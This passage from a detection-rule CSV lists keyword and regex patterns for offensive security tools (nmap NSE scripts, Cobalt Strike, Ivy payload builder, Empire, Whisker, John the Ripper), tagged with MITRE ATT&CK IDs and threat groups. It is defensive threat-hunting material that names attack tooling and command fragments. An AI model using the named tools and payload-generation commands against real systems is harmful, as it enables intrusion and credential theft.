Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1763" "* ip-geolocation-map-bing.nse*",".{0,1000}\sip\-geolocation\-map\-bing\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1764" "* ip-geolocation-map-google.nse*",".{0,1000}\sip\-geolocation\-map\-google\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1765" "* ip-geolocation-map-kml.nse*",".{0,1000}\sip\-geolocation\-map\-kml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1766" "* ip-geolocation-maxmind.nse*",".{0,1000}\sip\-geolocation\-maxmind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1767" "* ip-https-discover.nse*",".{0,1000}\sip\-https\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1768" "* ipidseq.nse*",".{0,1000}\sipidseq\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1769" "* ipmi-brute.nse*",".{0,1000}\sipmi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1770" "* ipmi-cipher-zero.nse*",".{0,1000}\sipmi\-cipher\-zero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1771" "* ipmi-version.nse*",".{0,1000}\sipmi\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1772" "* IPPrintC2.ps1*",".{0,1000}\sIPPrintC2\.ps1.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","1773" "* IPV6 addresses xored *",".{0,1000}\sIPV6\saddresses\sxored\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","1774" "* ipv6-multicast-mld-list.nse*",".{0,1000}\sipv6\-multicast\-mld\-list\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1775" "* ipv6-node-info.nse*",".{0,1000}\sipv6\-node\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1776" "* ipv6-ra-flood.nse*",".{0,1000}\sipv6\-ra\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1777" "* irc-botnet-channels.nse*",".{0,1000}\sirc\-botnet\-channels\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1778" "* irc-brute.nse*",".{0,1000}\sirc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1779" "* irc-info.nse*",".{0,1000}\sirc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1780" "* irc-sasl-brute.nse*",".{0,1000}\sirc\-sasl\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1781" "* irc-unrealircd-backdoor.nse*",".{0,1000}\sirc\-unrealircd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1782" "* is a C# tool for taking over Active Directory user and computer accounts by manipulating their *",".{0,1000}\sis\sa\sC\#\stool\sfor\staking\sover\sActive\sDirectory\suser\sand\scomputer\saccounts\sby\smanipulating\stheir\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1783" "* is a C# tool for taking over Active Directory user and computer accounts by manipulating their *",".{0,1000}\sis\sa\sC\#\stool\sfor\staking\sover\sActive\sDirectory\suser\sand\scomputer\saccounts\sby\smanipulating\stheir\s.{0,1000}","offensive_tool_keyword","Whisker","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1784" "* -isbeacon *",".{0,1000}\s\-isbeacon\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","1785" "* iscsi-brute.nse*",".{0,1000}\siscsi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap 
NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1786" "* iscsi-info.nse*",".{0,1000}\siscsi\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1787" "* isns-info.nse*",".{0,1000}\sisns\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1788" "* --isroca --publickey *",".{0,1000}\s\-\-isroca\s\-\-publickey\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1789" "* -it bloodhound*",".{0,1000}\s\-it\sbloodhound.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","0","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","1790" "* -Ix64 *.bin -Ix86 *.bin -P Inject -O *.png -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-O\s.{0,1000}\.png\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1791" "* -Ix64 *.bin -Ix86 
*.bin -P Local -O *.hta -url http:* -delivery hta -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.hta\s\-url\shttp\:.{0,1000}\s\-delivery\shta\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1792" "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.js -url http* -delivery bits -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.js\s\-url\shttp.{0,1000}\s\-delivery\sbits\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1793" "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.txt -url http* -delivery macro -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.txt\s\-url\shttp.{0,1000}\s\-delivery\smacro\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1794" "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.xsl -url http* -delivery xsl -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.xsl\s\-url\shttp.{0,1000}\s\-delivery\sxsl\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is 
a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1795" "* -Ix64 *.c -Ix86 *.c -P Local -O *.js*",".{0,1000}\s\-Ix64\s.{0,1000}\.c\s\-Ix86\s.{0,1000}\.c\s\-P\sLocal\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1796" "* -Ix64 *.vba -Ix86 *.vba -P Inject -O *",".{0,1000}\s\-Ix64\s.{0,1000}\.vba\s\-Ix86\s.{0,1000}\.vba\s\-P\sInject\s\-O\s.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","1797" "* -jar ysoserial.jar*",".{0,1000}\s\-jar\sysoserial\.jar.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1799" "* jdwp-exec.nse*",".{0,1000}\sjdwp\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1800" "* jdwp-info.nse*",".{0,1000}\sjdwp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1801" "* jdwp-inject.nse*",".{0,1000}\sjdwp\-inject\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1802" "* jdwp-version.nse*",".{0,1000}\sjdwp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1803" "* jecretz.py*",".{0,1000}\sjecretz\.py.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","0","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","1804" "* -JMXConsole -AppName *",".{0,1000}\s\-JMXConsole\s\-AppName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1805" "* john_done*",".{0,1000}\sjohn_done.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1806" "* john_fork*",".{0,1000}\sjohn_fork.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1807" "* john_load*",".{0,1000}\sjohn_load.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1808" "* john_load_conf*",".{0,1000}\sjohn_load_conf.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1809" "* john_load_conf_db*",".{0,1000}\sjohn_load_conf_db.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1810" "* john_log_format*",".{0,1000}\sjohn_log_format.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1811" "* john_log_format2*",".{0,1000}\sjohn_log_format2.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1812" "* 
